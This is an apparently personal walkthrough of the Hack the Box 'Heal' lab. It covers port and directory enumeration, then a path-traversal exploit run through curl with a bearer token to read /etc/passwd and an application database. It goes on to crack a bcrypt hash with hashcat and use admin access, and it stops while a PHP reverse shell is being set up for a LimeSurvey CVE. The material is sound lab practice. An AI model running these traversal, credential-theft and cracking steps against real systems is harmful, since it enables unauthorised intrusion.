HTB: Heal

Heal is a medium difficulty lab on Hack the Box. This lab invloved API exploitation and using publicly known exploits. Good enumeartion was important becuase it made it easier to put the peices of the puzzle togehter is I progressed though the lab. Overall, this was a fun lab that allowed me to practice my web app skills.

Enumeration

Run nmap to identify open ports on the target

nmap -p- 10.10.11.46 -o 46_nmap_allports

Results show that port 22 and 80 are the only TCP ports open.
Run a more detailed scan on open ports and start a UDP port scan

nmap -sC -sV -p 22,80 10.10.11.46 -o nmap_46_services

sudo nmap -sU --top-ports 500 10.10.11.46 -o nmap_46_udp

TCP scan returned versions for OpenSSH and nginx web server. UDP scan returned ports 68 and 5353 open. Decided to focus on open TCP ports to start.

There were no publicly available exploits for the OpenSSH or nginx software versions running

I Turned my foucs towards the web application

I had to add heal.htb to /etc/hosts

The initial web page is a login screen. Create an account to browse the application.

See that the website has a resume builder function with several user input fields. Added “resume” to list of known directories
Run gobuster scans in the background while browsing the application

gobuster dir -u http://heal.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -r -k -o gobuster_46 -x txt,xml,php

gobuster vhost -u heal.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -o gobuster_46_vhost

While navigating the website, identified the sub domain "take-survey.heal.htb". Added to /etc/hosts

Noted that the Limesurvey software was running. Also noted ralph was a potential username and added to a users.txt file. Ran quick search to see if there were known exploits for the software. Several exploits were returned including an authenticated RCE exploit. Made a note that exploits were available and I needed to find the version of Limesurvey and potentially credentials. Checked the page source code quickly to try and identify the version, but was unsuccessful. At this point I returned to check the gobuster scan results

Found the subdomain “api.heal.htb” and added to /etc/hosts. Nothing of note returned for the other gobuster command

Ran gobuster commands to identify endpoint on the two subdomains discovered

gobuster dir -u http://api.heal.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/api/actions.txt -r -k -o gobuster_46_api

gobuster dir -u http://take-survey.heal.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -r -k -o gobuster_46_take-survey -x txt,xml,php

Additionally, reviewed burpsuite proxy traffic. Identified the API endpoints, "export", "signin", and "signup". Saved all endpoints to a file to keep track of them.

I navigated to take-survey.heal.htb/admin and tried to log in with the default credentials for the application as well as the usernames admin and ralph with common passwords. These attempts were unsuccessful.

Refocused efforts on the web API. Circled back to the download endpoint for the API. Tested for a path traversal vulnerability in the filename parameter

Success! Based on the results I added ron, postgres and root to the users.txt file, since they were users with a shell assigned. Now it's time to exploit the LFI vulnerability to gain a foothold.

Exploit

Once the vulnerability was identified I switched to using the curl command so it would be easier to save the output

Captured the /etc/passwd file on the target system

curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoyfQ.73dLFyR_K1A7yY9uDP6xu7H1p_c7DlFQEoN1g-LFFMQ' "api.heal.htb/download?filename=../../../../../etc/passwd" -o passwd.txt

Additionally, tried getting /etc/shadow and SSH keys for users but was unsuccessful

I attempted to pull the config file to expose the password or learn more about the instillation. Online research showed that the config file was located at limesurvey/application/config/config.php Several attempts to download the config.php were made by editing the relative file path and levels of directory traversal, but were unsuccessful.

Reasoned I must be accessing the web directory for RubyonRails, so I did research on where that config file was located

Documentation showed the application should be accessing a database specified in the config/database.yml

curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoyfQ.73dLFyR_K1A7yY9uDP6xu7H1p_c7DlFQEoN1g-LFFMQ' "api.heal.htb/download?filename=../../config/database.yml"

This confirmed the path to the database was storage/development.sqlite3

curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoyfQ.73dLFyR_K1A7yY9uDP6xu7H1p_c7DlFQEoN1g-LFFMQ' "api.heal.htb/download?filename=../../ storage/development.sqlite3" -o development.sqlite3

Opened the database and found a password hash for ralph

Saved the hash in the file hash.txt and checked type with hashid

hashid hash.txt

Researched hash types used by Ruby on Rails and determined bcrypt was the most likely hash. Attempted to crack with hashcat.

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt –force

Successfully logged in to the admin portal at take-survey.heal.htb/admin using the recovered credentials

Noted the actual version of Limesurvey running was 6.6.4 Community edition

Researched exploits against Limesurvey version 6.6.4 and discovered it is vulnerable to CVE2021-44967

Made the necessary changes to the exploit to make it run. Copied php reverse shell from /usr/share/webshells/php/php-reverse-shell.php into working directory and edited to change IP and port for shel